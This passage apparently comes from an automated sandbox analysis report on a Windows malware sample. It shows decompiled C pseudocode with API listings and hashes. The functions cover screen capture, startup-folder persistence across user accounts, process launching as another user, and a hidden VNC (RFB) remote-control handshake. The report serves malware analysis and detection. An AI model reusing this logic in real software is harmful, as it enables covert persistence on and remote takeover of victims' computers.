    • GetProcAddress.KERNEL32(?,GetDeviceCaps), ref: 0040F336
    • GetProcAddress.KERNEL32(?,SelectObject), ref: 0040F343
    • GetProcAddress.KERNEL32(?,BitBlt), ref: 0040F350
    • GetProcAddress.KERNEL32(?,DeleteObject), ref: 0040F35D
    • GetProcAddress.KERNEL32(?,DeleteDC), ref: 0040F36A
    • LoadImageW.USER32 ref: 0040F40E
    • GetIconInfo.USER32(00000000,?), ref: 0040F423
    • GetCursorPos.USER32(?), ref: 0040F431
    • DrawIcon.USER32 ref: 0040F502
    • lstrcmpiW.KERNEL32(?,-00000030), ref: 0040F583
    • FreeLibrary.KERNEL32(?), ref: 0040F69A
    • FreeLibrary.KERNEL32(?), ref: 0040F6A4
    • FreeLibrary.KERNEL32(?), ref: 0040F6AE
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: AddressProc$Library$Load$Free$Icon$CursorDrawImageInfolstrcmpi
    • String ID: BitBlt$CreateCompatibleBitmap$CreateCompatibleDC$CreateDCW$CreateStreamOnHGlobal$DISPLAY$DeleteDC$DeleteObject$GdipCreateBitmapFromHBITMAP$GdipDisposeImage$GdipGetImageEncoders$GdipGetImageEncodersSize$GdipSaveImageToStream$GdiplusShutdown$GdiplusStartup$GetDeviceCaps$SelectObject$gdi32.dll$gdiplus.dll$ole32.dll
    • API String ID: 1554524784-1167942225
    • Opcode ID: bbfb7271da9023b2b961b17bd7e9098c7fd40228dda027d17a1f6b42fbc8e1ae
    • Instruction ID: daa54bb737d235d3338be45f21d37602089b3d4cc920bcd6889f1cd0fecd3cf7
    • Opcode Fuzzy Hash: bbfb7271da9023b2b961b17bd7e9098c7fd40228dda027d17a1f6b42fbc8e1ae
    • Instruction Fuzzy Hash: C3E1D771D00259ABCF209FE1CC85AAEBFB9FF08301F14453AE915B26A0D7799A45CF58
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 89%
    			E00406F85(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* __ebp;
    				void* _t74;
    				void* _t79;
    				intOrPtr* _t80;
    				void* _t82;
    				void* _t84;
    				void* _t88;
    				void* _t92;
    				int _t100;
    				int _t108;
    				void* _t113;
    				intOrPtr _t130;
    				void* _t138;
    				void* _t145;
    				void* _t147;
    				void* _t152;
    				void* _t154;
    
    				_t138 = __edx;
    				_t135 = __ecx;
    				_t152 = _t154 - 0x70;
    				_t149 = _t152 + 0x50;
    				 *(_t152 + 0x6f) = 0;
    				if(E0041B63F(0, __ecx, _t152 + 0x50,  *0x42299c) != 0) {
    					 *(_t152 + 0x68) =  *(_t152 + 0x54);
    					_t130 = E00406C01(_t152 + 0x68, __ecx,  *(_t152 + 0x50));
    					 *((intOrPtr*)(_t152 + 0x60)) = _t130;
    					if(_t130 == 0) {
    						 *(_t152 + 0x68) = 0;
    					}
    					_t71 = E0041B6E7(_t152 + 0x50);
    				}
    				if( *(_t152 + 0x68) != 0x1e6) {
    					__eflags =  *(_t152 + 0x68) - 0xc;
    					if( *(_t152 + 0x68) != 0xc) {
    						L41:
    						E00416421( *((intOrPtr*)(_t152 + 0x60)));
    						return  *(_t152 + 0x6f);
    					}
    					_t74 = E0040679A(_t135, 0x8889347b, 2);
    					 *(_t152 + 0x5c) = _t74;
    					__eflags = _t74;
    					if(_t74 == 0) {
    						L39:
    						__eflags =  *(_t152 + 0x7c) - 1;
    						if( *(_t152 + 0x7c) == 1) {
    							E00417E86(0, _t149,  *0x42299c);
    						}
    						goto L41;
    					}
    					E00406762(0x19367401, _t152 - 0x18, 1);
    					_t79 = E00419C04(_t152 - 0x18);
    					_t149 = GetFileAttributesExW;
    					__eflags = _t79;
    					if(_t79 == 0) {
    						L23:
    						_t80 =  *0x422944; // 0x0
    						__imp__IsWellKnownSid( *_t80, 0x16);
    						__eflags = _t80 - 1;
    						if(__eflags != 0) {
    							 *(_t152 + 0x6f) = 0;
    							_t82 = ReadProcessMemory(0xffffffff, _t149, _t152 + 0x6f, 1, 0);
    							__eflags = _t82;
    							if(_t82 == 0) {
    								L29:
    								_push( *((intOrPtr*)( *((intOrPtr*)(_t152 + 0x60)))));
    								_t84 = E0041C844(_t135, L0040E847,  *((intOrPtr*)( *((intOrPtr*)(_t152 + 0x60)) + 4)));
    								_t149 = 0x4229a0;
    								 *(_t152 + 0x6f) = L0040E847(_t84, 0, L0040E847, 0x4229a0);
    								L30:
    								__eflags =  *(_t152 + 0x6f) - 1;
    								if( *(_t152 + 0x6f) == 1) {
    									_t88 = E00417CE8(_t152 - 0x294, 0, _t149, 0, _t152 + 0x4c);
    									__eflags = _t88;
    									 *(_t152 + 0x6f) = _t88 != 0;
    									__eflags =  *(_t152 + 0x6f);
    									if( *(_t152 + 0x6f) != 0) {
    										E00406762(0x1a43533f, _t152 - 0x18, 1);
    										_t92 = CreateEventW(0x422978, 1, 0, _t152 - 0x18);
    										_t145 =  *(_t152 + 0x4c);
    										 *(_t152 + 0x64) = _t92;
    										 *(_t152 + 0x68) = _t145;
    										_push(0xffffffff);
    										__eflags = _t92;
    										if(_t92 != 0) {
    											WaitForMultipleObjects(2, _t152 + 0x64, 0, ??);
    										} else {
    											WaitForSingleObject(_t145, ??);
    										}
    										_t149 = CloseHandle;
    										__eflags =  *(_t152 + 0x64);
    										if( *(_t152 + 0x64) != 0) {
    											CloseHandle( *(_t152 + 0x64));
    										}
    										CloseHandle( *(_t152 + 0x50));
    										CloseHandle(_t145);
    									}
    								}
    								L38:
    								E00419BF4( *(_t152 + 0x5c));
    								goto L39;
    							}
    							__eflags =  *(_t152 + 0x6f) - 0xe9;
    							if( *(_t152 + 0x6f) != 0xe9) {
    								goto L29;
    							}
    							_t100 = GetFileAttributesExW(0x422dae, 0x78f16360, _t152 + 0x68);
    							__eflags = _t100 - 1;
    							if(_t100 != 1) {
    								goto L29;
    							}
    							_push( *((intOrPtr*)( *((intOrPtr*)(_t152 + 0x60)))));
    							E0041C844(_t135, E0040EBB3,  *((intOrPtr*)( *((intOrPtr*)(_t152 + 0x60)) + 8)));
    							_push( *((intOrPtr*)(_t152 + 0x78)));
    							_t149 = 0x4229a0;
    							_push(_t152 - 0x294);
    							 *(_t152 + 0x6f) = E0040EBB3(_t152 - 0x294, 0x4229a0);
    							VirtualFree( *(_t152 + 0x68), 0, 0x8000);
    							goto L30;
    						}
    						 *(_t152 + 0x6f) = E0040EECB(__eflags);
    						goto L38;
    					} else {
    						goto L20;
    					}
    					while(1) {
    						L20:
    						 *(_t152 + 0x6f) = 0;
    						_t108 = ReadProcessMemory(0xffffffff, _t149, _t152 + 0x6f, 1, 0);
    						__eflags = _t108;
    						if(_t108 == 0) {
    							goto L22;
    						}
    						__eflags =  *(_t152 + 0x6f) - 0xe9;
    						if( *(_t152 + 0x6f) == 0xe9) {
    							goto L23;
    						}
    						L22:
    						Sleep(0x1f4);
    					}
    				}
    				if(E0040EAFC(_t71, 0, _t138,  *((intOrPtr*)(_t152 + 0x60))) != 0) {
    					E00406762(0x32901130, _t152 - 0x18, 1);
    					_t113 = CreateMutexW(0x422978, 1, _t152 - 0x18);
    					 *(_t152 + 0x7c) = _t113;
    					if(_t113 != 0) {
    						if(GetLastError() == 0xb7) {
    							CloseHandle( *(_t152 + 0x7c));
    							 *(_t152 + 0x7c) = 0;
    						}
    						if( *(_t152 + 0x7c) != 0) {
    							E0041CD26(_t135, _t152 - 0x8c);
    							if(( *(_t152 - 0x8c) & 0x00000020) != 0) {
    								 *0x422940 =  *0x422940 | 0x00000010;
    							}
    							E0041CB9B();
    							if(( *0x422940 & 0x00000010) != 0) {
    								ExitWindowsEx(0x14, 0x80000000);
    							}
    							E00406762(0x1a43533f, _t152 - 0x18, 1);
    							_t147 = OpenEventW(2, 0, _t152 - 0x18);
    							if(_t147 != 0) {
    								SetEvent(_t147);
    								CloseHandle(_t147);
    							}
    							E00406CBE(1);
    							 *(_t152 + 0x6f) = 1;
    							CloseHandle( *(_t152 + 0x7c));
    						}
    					}
    				}
    				goto L41;
    			}

    APIs
      • Part of subcall function 0041B63F: CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000,?,?,?,?,00406FA8,?,?,00000000), ref: 0041B664
      • Part of subcall function 0041B63F: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,00406FA8,?,?,00000000), ref: 0041B677
    • CreateMutexW.KERNEL32(00422978,00000001,?,32901130,?,00000001,?,?,?,00000000), ref: 00407007
    • GetLastError.KERNEL32(?,?,00000000), ref: 00407018
    • CloseHandle.KERNEL32(00000001,?,?,00000000), ref: 0040702E
    • ExitWindowsEx.USER32(00000014,80000000), ref: 0040706D
    • OpenEventW.KERNEL32(00000002,00000000,?,1A43533F,?,00000001,?,?,?,00000000), ref: 0040708A
    • SetEvent.KERNEL32(00000000,?,?,00000000), ref: 00407097
    • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 0040709E
    • CloseHandle.KERNEL32(00000001,00000001,?,?,00000000), ref: 004070AE
    • ReadProcessMemory.KERNEL32(000000FF,74B5F9B0,?,00000001,00000000,?,19367401,?,00000001,8889347B,00000002,?,?,00000000), ref: 0040710C
    • Sleep.KERNEL32(000001F4,?,?,00000000), ref: 0040711D
    • IsWellKnownSid.ADVAPI32(00000000,00000016,?,19367401,?,00000001,8889347B,00000002,?,?,00000000), ref: 0040712E
    • ReadProcessMemory.KERNEL32(000000FF,74B5F9B0,?,00000001,00000000,?,?,00000000), ref: 00407153
    • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,?,00000000), ref: 004071AB
    • GetFileAttributesExW.KERNEL32(00422DAE,78F16360,?,?,?,00000000), ref: 0040716D
      • Part of subcall function 0041C844: VirtualProtect.KERNEL32(0040E847,?,00000040,00000000,74B5F9B0,?,?,004071C5,?,?,?,?,00000000), ref: 0041C859
      • Part of subcall function 0041C844: VirtualProtect.KERNEL32(0040E847,?,00000000,00000000,?,?,004071C5,?,?,?,?,00000000), ref: 0041C88C
    • CreateEventW.KERNEL32(00422978,00000001,00000000,?,1A43533F,?,00000001,?,?,00000000,004229A0,00000000,?,?,?), ref: 0040721A
    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000), ref: 00407230
    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,00000000), ref: 0040723F
    • CloseHandle.KERNEL32(?,?,?,00000000), ref: 00407253
    • CloseHandle.KERNEL32(?,?,?,00000000), ref: 00407258
    • CloseHandle.KERNEL32(?,?,?,00000000), ref: 0040725B
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CloseHandle$CreateEventFileVirtual$MemoryProcessProtectReadWait$AttributesErrorExitFreeKnownLastMultipleMutexObjectObjectsOpenSingleSizeSleepWellWindows
    • String ID:
    • API String ID: 561470431-0
    • Opcode ID: cc22bac0ad0d528d494838612f812a993b95ada581cecfa0022af5c1be135b8d
    • Instruction ID: cefdd733b68a1f684ce7cee773fdfd2090efc8e94e62b965008ea2b1982ce5e8
    • Opcode Fuzzy Hash: cc22bac0ad0d528d494838612f812a993b95ada581cecfa0022af5c1be135b8d
    • Instruction Fuzzy Hash: 5791A271904248AFDF20AF61CE85EEE3BA9EF04354F00007AFD15B62E1C7789855CB6A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 81%
    			E0040EECB(void* __eflags) {
    				char _v5;
    				char* _v12;
    				char _v16;
    				int _v20;
    				int _v24;
    				int _v28;
    				int _v32;
    				char _v56;
    				char _v88;
    				char _v608;
    				short _v1128;
    				char _v1648;
    				void* __edi;
    				void* __esi;
    				_Unknown_base(*)()* _t63;
    				int _t69;
    				char _t70;
    				char _t76;
    				int _t80;
    				char _t81;
    				char _t82;
    				char _t86;
    				char _t88;
    				WCHAR* _t98;
    				int _t99;
    				CHAR* _t110;
    				char* _t111;
    				WCHAR* _t112;
    				struct HINSTANCE__* _t113;
    				signed int _t114;
    				void* _t115;
    
    				_t112 =  &_v56;
    				_v5 = 0;
    				E004159A4(0xe1, _t112);
    				_t113 = LoadLibraryW(_t112);
    				if(_t113 == 0) {
    					L7:
    					return 0;
    				} else {
    					_t110 =  &_v88;
    					E0041596E(0xe2, _t110);
    					_t63 = GetProcAddress(_t113, _t110);
    					if(_t63 != 0) {
    						_push( &_v12);
    						_t106 =  &_v608;
    						_push( &_v608);
    						_v12 = 0x104;
    						if( *_t63() == 1) {
    							_t98 =  &_v1128;
    							__imp__SHGetFolderPathW(0, 7, 0xffffffff, 1, _t98);
    							if(_t98 == 0) {
    								_t106 =  &_v608;
    								_t99 = E00416F70(_t106);
    								_v12 = _t99;
    								if(StrCmpNIW(_t106,  &_v1128, _t99) == 0) {
    									_t106 = _t115 + _v12 * 2 - 0x464;
    									E004167C2(_t102 | 0xffffffff, _t115 + _v12 * 2 - 0x464,  &_v1128);
    									_v5 = 1;
    								}
    							}
    						}
    					}
    					FreeLibrary(_t113);
    					if(_v5 != 0) {
    						_v5 = 0;
    						_v28 = 0;
    						_t111 = L".exe";
    						do {
    							_v12 = 0;
    							_t69 = NetUserEnum(0, 0, 2,  &_v12, 0xffffffff,  &_v20,  &_v32,  &_v28);
    							_v24 = _t69;
    							__eflags = _t69;
    							if(_t69 == 0) {
    								L11:
    								__eflags = _v12;
    								if(_v12 == 0) {
    									goto L24;
    								}
    								_t114 = 0;
    								__eflags = _v20;
    								if(_v20 <= 0) {
    									L23:
    									NetApiBufferFree(_v12);
    									goto L24;
    								} else {
    									goto L13;
    								}
    								do {
    									L13:
    									_t80 = NetUserGetInfo(0,  *(_v12 + _t114 * 4), 0x17,  &_v16);
    									__eflags = _t80;
    									if(_t80 == 0) {
    										_t81 = _v16;
    										__eflags = _t81;
    										if(_t81 != 0) {
    											_t106 =  &_v608;
    											_t82 = E004074DB( *((intOrPtr*)(_t81 + 0x10)),  &_v608);
    											__eflags = _t82;
    											if(_t82 != 0) {
    												_t86 = E0041BCB4( &_v1128,  &_v608,  &_v608);
    												__eflags = _t86;
    												if(_t86 != 0) {
    													_t88 = E0041BA36( &_v608);
    													__eflags = _t88;
    													if(_t88 != 0) {
    														__eflags = E0041A8D1(0,  &_v608,  &_v1648, _t111, 6);
    														if(__eflags != 0) {
    															__eflags = E0040E612( &_v608, __eflags, 0,  &_v1648, 0);
    															if(__eflags != 0) {
    																_v5 = 1;
    																E0040E73F( &_v608, __eflags,  *((intOrPtr*)(_v16 + 0x10)),  &_v1648);
    															}
    														}
    													}
    												}
    											}
    											NetApiBufferFree(_v16);
    										}
    									}
    									_t114 = _t114 + 1;
    									__eflags = _t114 - _v20;
    								} while (_t114 < _v20);
    								goto L23;
    							}
    							__eflags = _t69 - 0xea;
    							if(_t69 != 0xea) {
    								break;
    							}
    							goto L11;
    							L24:
    							__eflags = _v24 - 0xea;
    						} while (_v24 == 0xea);
    						_t70 =  &_v1128;
    						__imp__SHGetFolderPathW(0, 0x8007, 0xffffffff, 1, _t70);
    						__eflags = _t70;
    						if(_t70 == 0) {
    							__eflags = E0041A8D1(0,  &_v1128,  &_v1648, _t111, 6);
    							if(__eflags != 0) {
    								_t76 = E0040E612(_t106, __eflags, 0,  &_v1648, 0);
    								__eflags = _t76;
    								if(_t76 != 0) {
    									_v5 = 1;
    								}
    							}
    						}
    						return _v5;
    					}
    					goto L7;
    				}
    			}

    APIs
    • LoadLibraryW.KERNEL32(?,74B05B60,74B5F9B0,00000000), ref: 0040EEEC
    • GetProcAddress.KERNEL32(00000000,?), ref: 0040EF0D
    • SHGetFolderPathW.SHELL32(00000000,00000007,000000FF,00000001,?), ref: 0040EF3E
    • StrCmpNIW.SHLWAPI(?,?,00000000), ref: 0040EF61
    • FreeLibrary.KERNEL32(00000000), ref: 0040EF88
    • NetUserEnum.NETAPI32(00000000,00000000,00000002,?,000000FF,0040713E,?,?), ref: 0040EFBE
    • NetUserGetInfo.NETAPI32(00000000,?,00000017,?), ref: 0040EFF7
    • NetApiBufferFree.NETAPI32(?,?,?), ref: 0040F090
    • NetApiBufferFree.NETAPI32(?), ref: 0040F0A3
    • SHGetFolderPathW.SHELL32(00000000,00008007,000000FF,00000001,?), ref: 0040F0C7
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Free$BufferFolderLibraryPathUser$AddressEnumInfoLoadProc
    • String ID: .exe
    • API String ID: 1753652487-4119554291
    • Opcode ID: 214f405c233c4c1bbcab52740121be6b5d5332fe82d0d5b6a7509f1374402142
    • Instruction ID: cc0b30bccd14120b24606f28cb6381146b358b84bc4e54c44f8bbee4a5fd5b43
    • Opcode Fuzzy Hash: 214f405c233c4c1bbcab52740121be6b5d5332fe82d0d5b6a7509f1374402142
    • Instruction Fuzzy Hash: C46170B1900218AEDF20DB90CD84EEEB7BDAB44344F5045BAF541F61D2D7399E498B29
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 58%
    			E00417D43(void* _a4, WCHAR* _a8) {
    				WCHAR* _v5;
    				char _v12;
    				signed int _v16;
    				struct HINSTANCE__* _v20;
    				_Unknown_base(*)()* _v24;
    				struct _PROCESS_INFORMATION _v40;
    				struct _STARTUPINFOW _v108;
    				struct HINSTANCE__* _t28;
    				_Unknown_base(*)()* _t31;
    				WCHAR* _t49;
    				long _t50;
    				intOrPtr* _t52;
    
    				_v5 = 0;
    				_t28 = LoadLibraryA("userenv.dll");
    				_v20 = _t28;
    				if(_t28 != 0) {
    					_t52 = GetProcAddress(_t28, "CreateEnvironmentBlock");
    					_t31 = GetProcAddress(_v20, "DestroyEnvironmentBlock");
    					_v24 = _t31;
    					if(_t52 != 0 && _t31 != 0) {
    						_push(0);
    						_push(_a4);
    						_push( &_v16);
    						_v16 = 0;
    						if( *_t52() == 0) {
    							_v16 = 0;
    						}
    						_t50 = 0x44;
    						_v12 = 0;
    						E004164D4( &_v108,  &_v108, 0, _t50);
    						_t49 = _a8;
    						_v108.cb = _t50;
    						_v108.lpDesktop = 0;
    						if(_t49 == 0) {
    							_t49 =  &_v12;
    						}
    						asm("sbb eax, eax");
    						if(CreateProcessAsUserW(_a4, 0, _t49, 0, 0, 0,  ~_v16 & 0x00000400 | 0x04000000, _v16, 0,  &_v108,  &_v40) != 0) {
    							CloseHandle(_v40.hThread);
    							CloseHandle(_v40);
    							_v5 = _v40.dwProcessId != 0;
    						}
    						if(_v16 != 0) {
    							_v24(_v16);
    						}
    					}
    					FreeLibrary(_v20);
    				}
    				return _v5 & 0x000000ff;
    			}

    APIs
    • LoadLibraryA.KERNEL32(userenv.dll,00000000), ref: 00417D54
    • GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 00417D73
    • GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 00417D7F
    • CreateProcessAsUserW.ADVAPI32(?,00000000,0040E722,00000000,00000000,00000000,0040E722,0040E722,00000000,?,?,?,00000000,00000044), ref: 00417DF0
    • CloseHandle.KERNEL32(?), ref: 00417E03
    • CloseHandle.KERNEL32(?), ref: 00417E08
    • FreeLibrary.KERNEL32(?), ref: 00417E1F
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: AddressCloseHandleLibraryProc$CreateFreeLoadProcessUser
    • String ID: CreateEnvironmentBlock$DestroyEnvironmentBlock$userenv.dll
    • API String ID: 3080530829-1103369309
    • Opcode ID: 43a399e7f514e9dfd2638ba603818f931e42414218bdaec9a412893037d00d05
    • Instruction ID: 2ac8969cb8a45545e353dcb162156a037fb4fa25b77ec9b6065a62f9bc8d7e22
    • Opcode Fuzzy Hash: 43a399e7f514e9dfd2638ba603818f931e42414218bdaec9a412893037d00d05
    • Instruction Fuzzy Hash: 612105B2D0021DABDF009FA4DC859EFBBB8EF48344B14847AE615F6160D6399E54CB64
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 70%
    			E0040AE91(void* __eflags, char _a4, intOrPtr _a8, intOrPtr _a12, signed char _a15, void* _a16) {
    				signed int _v8;
    				signed int _v13;
    				signed short _v15;
    				signed int _v16;
    				signed int _v20;
    				signed int _v24;
    				signed int _v28;
    				char _v31;
    				signed int _v32;
    				signed int _v36;
    				short _v41;
    				short _v43;
    				char _v44;
    				char _v49;
    				char _v52;
    				char _v53;
    				char _v56;
    				char _v60;
    				signed int _v64;
    				char _v77;
    				char _v78;
    				unsigned int _v80;
    				signed int _v84;
    				char _v100;
    				signed short _v102;
    				signed short _v104;
    				signed int _v109;
    				char _v112;
    				char _v116;
    				char _v124;
    				char _v380;
    				void* __edi;
    				void* __esi;
    				void* _t205;
    				char _t206;
    				void* _t208;
    				signed char _t212;
    				unsigned int _t220;
    				signed int _t225;
    				signed int _t257;
    				signed int _t261;
    				signed int _t262;
    				void* _t264;
    				signed int _t265;
    				void* _t274;
    				void* _t280;
    				signed int _t288;
    				signed int _t289;
    				void* _t291;
    				signed int _t292;
    				signed short _t296;
    				unsigned int _t297;
    				signed int _t300;
    				signed int _t301;
    				signed int _t303;
    				intOrPtr _t305;
    				signed int _t309;
    				void* _t311;
    				signed int _t312;
    				signed int _t316;
    				signed int _t318;
    				signed int _t319;
    				void* _t321;
    				signed int _t322;
    				signed int _t329;
    				void* _t331;
    				signed int _t332;
    				signed int _t333;
    				signed char _t335;
    				void* _t352;
    				signed int _t353;
    				void* _t355;
    				signed int _t356;
    				signed int _t366;
    				signed int _t375;
    				signed int _t382;
    				signed int _t389;
    				signed int _t390;
    				unsigned int _t426;
    				signed char _t442;
    				signed char _t444;
    				signed char _t446;
    				signed int _t452;
    				signed int _t461;
    				void* _t472;
    				signed int _t479;
    				signed int _t490;
    				signed int _t491;
    				signed int _t496;
    				char _t505;
    				intOrPtr _t506;
    				signed int _t507;
    				signed short _t509;
    				intOrPtr* _t517;
    				signed int _t525;
    				void* _t527;
    
    				_t506 = _a8;
    				_t206 = E0041944B(_t205, _a4, "RFB 003.003\n", 0xc);
    				if(_t206 == 0) {
    					L107:
    					return _t206;
    				}
    				_push(0x1b7740);
    				_push( &_v60);
    				_t208 = 0xc;
    				_t206 = E004193D4(_t208, _a4);
    				if(_t206 == 0) {
    					goto L107;
    				}
    				_push( &_v60);
    				_t472 = 4;
    				_t206 = E00416F84(_t472, "RFB ", _t472);
    				if(_t206 != 0) {
    					goto L107;
    				}
    				_v53 = _t206;
    				_v49 = _t206;
    				_t212 = E00416AA0( &_v52, "RFB ", 0);
    				_t206 = ((E00416AA0( &_v56, "RFB ", 0) & 0x000000ff | (_t212 & 0x000000ff) << 0x00000008) & 0x0000ffff) + 0xfffffcfd;
    				if(_t206 > 0x300) {
    					goto L107;
    				} else {
    					_v24 = _v24 & 0x00000000;
    					_v20 = 1;
    					 *((intOrPtr*)(_t506 + 4))( &_v24);
    					_t220 = _v20;
    					_t479 = (_t220 & 0x0000ff00 | _t220 << 0x00000010) << 8;
    					_t399 = (_t220 & 0x00ff0000 | _t220 >> 0x00000010) >> 0x00000008 | _t479;
    					_v36 = (_t220 & 0x00ff0000 | _t220 >> 0x00000010) >> 0x00000008 | _t479;
    					if(E0041944B( &_v36, _a4,  &_v36, 4) == 0) {
    						_v20 = _v20 | 0xffffffff;
    					}
    					_t225 = _v20;
    					if(_t225 == 0) {
    						return E0040AE2B(_t399, __eflags, _a4, _v24);
    					}
    					_t206 = _t225 - 1;
    					if(_t206 != 0) {
    						goto L107;
    					}
    					_t206 = E004193D4(1, _a4,  &_v31, 0x1b7740);
    					if(_t206 == 0) {
    						goto L107;
    					}
    					_t206 =  *((intOrPtr*)(_t506 + 8))();
    					if(_t206 == 0) {
    						goto L107;
    					}
    					_v36 = _v36 & 0x00000000;
    					_t206 =  *((intOrPtr*)(_t506 + 0xc))( &_v124);
    					_t403 = _t206;
    					_t541 = _t206;
    					if(_t206 == 0) {
    						goto L107;
    					}
    					_t206 = E0040AC6A( &_v124, _t403,  &_v36, _t541, _a12);
    					_t505 = _t206;
    					if(_t505 == 0) {
    						goto L107;
    					}
    					_t507 = E00416F5E(_v36);
    					_v104 =  *(_t505 + 8) << 0x00000008 |  *(_t505 + 9) & 0x000000ff;
    					_v102 =  *(_t505 + 0xa) << 0x00000008 |  *(_t505 + 0xb) & 0x000000ff;
    					_v84 = (_t507 & 0x00ff0000 | _t507 >> 0x00000010) >> 0x00000008 | (_t507 << 0x00000010 | _t507 & 0x0000ff00) << 0x00000008;
    					_t44 = _t505 + 0x20; // 0x20
    					E0041645D( &_v100, _t44, 0x10);
    					asm("rol word [ebp-0x5c], 0x8");
    					asm("rol word [ebp-0x5a], 0x8");
    					asm("rol word [ebp-0x58], 0x8");
    					if(E0041944B( &_v104, _a4,  &_v104, 0x18) == 0 || _t507 > 0 && E0041944B(_t247, _a4, _v36, _t507) == 0) {
    						return E0040ADF8(_t505);
    					} else {
    						_v41 = 0xffff;
    						_v44 = 0;
    						_v43 = 0xffff;
    						E004164D4( &_v380,  &_v380, 0, 0xff);
    						E004164D4( &_v380,  &_v380, 0, 0xff);
    						_v8 = 0;
    						_v20 = 0;
    						goto L16;
    						do {
    							while(1) {
    								L16:
    								_t375 = _v8;
    								_t509 = 0;
    								if(_t375 <= 0) {
    									goto L35;
    								}
    								L17:
    								_t274 = E004196D1(0,  &_a4, 0x12c, 0);
    								if(_t274 != 0xffffffff) {
    									goto L35;
    								}
    								__imp__#111();
    								if(_t274 != 0x274c) {
    									L104:
    									E0040ADF8(_t505);
    									return E00416421(_v20);
    								}
    								if(_a16 != 0) {
    									WaitForSingleObject(_a16, 0xffffffff);
    								}
    								 *((intOrPtr*)(_a8 + 0x10))();
    								_v28 = _t509;
    								if(_t375 <= _t509) {
    									L33:
    									if(_a16 != _t509) {
    										ReleaseMutex(_a16);
    									}
    									continue;
    									do {
    										while(1) {
    											L16:
    											_t375 = _v8;
    											_t509 = 0;
    											if(_t375 <= 0) {
    												goto L35;
    											}
    											goto L17;
    										}
    										L90:
    										__eflags =  *(_t505 + 0x1c);
    									} while ( *(_t505 + 0x1c) != 0);
    									break;
    								} else {
    									_v24 = _t509;
    									_t390 = _t375 * 9;
    									do {
    										_t527 = _v24 + _v20;
    										if( *((short*)(_t527 + 5)) > 0 &&  *((short*)(_t527 + 7)) > 0) {
    											_push(_t527);
    											_push(_a4);
    											_t280 = E0040A902(_t505);
    											if(_t280 == 0xffffffff || _t280 == 0) {
    												__eflags = _a16;
    												if(_a16 != 0) {
    													ReleaseMutex(_a16);
    												}
    												goto L104;
    											} else {
    												if(_t280 == 1) {
    													_t283 = _v28 + 1;
    													if(_v28 + 1 != _v8) {
    														E004164D4(_t283, _t527, 0, 9);
    													} else {
    														_v8 = _v8 - 1;
    														_t390 = _t390 - 9;
    														E004163AC(_t390,  &_v20);
    													}
    												}
    												goto L31;
    											}
    										}
    										L31:
    										_v28 = _v28 + 1;
    										_v24 = _v24 + 9;
    									} while (_v28 < _v8);
    									_t509 = 0;
    									goto L33;
    								}
    								L35:
    								_t376 = _a4;
    								_t414 = _a4;
    								_t257 = E004193D4(1, _a4,  &_a15, 0x1b7740);
    								__eflags = _t257;
    								if(_t257 == 0) {
    									goto L104;
    								}
    								_t261 = _a15 & 0x000000ff;
    								__eflags = _t261;
    								if(_t261 == 0) {
    									_t262 = E0041941C(_t414, _t376, 3, 0x1b7740);
    									__eflags = _t262;
    									if(_t262 == 0) {
    										goto L104;
    									}
    									_push(0x1b7740);
    									_push( &_v80);
    									_t264 = 0x10;
    									_t265 = E004193D4(_t264, _t376);
    									__eflags = _t265;
    									if(_t265 == 0) {
    										goto L104;
    									}
    									__eflags = _v80 - 0x20;
    									if(_v80 == 0x20) {
    										L99:
    										__eflags = _v77;
    										if(_v77 == 0) {
    											goto L104;
    										}
    										asm("rol word [ebp-0x48], 0x8");
    										asm("rol word [ebp-0x46], 0x8");
    										asm("rol word [ebp-0x44], 0x8");
    										__eflags = _v78;
    										_v78 = _t265 & 0xffffff00 | _v78 != 0x00000000;
    										_t196 = _t505 + 0x31; // 0x31
    										_v77 = 1;
    										E0041645D(_t196,  &_v80, 0x10);
    										 *(_t505 + 0x41) = _v80 >> 3;
    										while(1) {
    											L16:
    											_t375 = _v8;
    											_t509 = 0;
    											if(_t375 <= 0) {
    												goto L35;
    											}
    											goto L17;
    										}
    									}
    									__eflags = _v80 - 0x10;
    									if(_v80 == 0x10) {
    										goto L99;
    									}
    									__eflags = _v80 - 8;
    									if(_v80 != 8) {
    										goto L104;
    									}
    									goto L99;
    								}
    								_t288 = _t261;
    								__eflags = _t288;
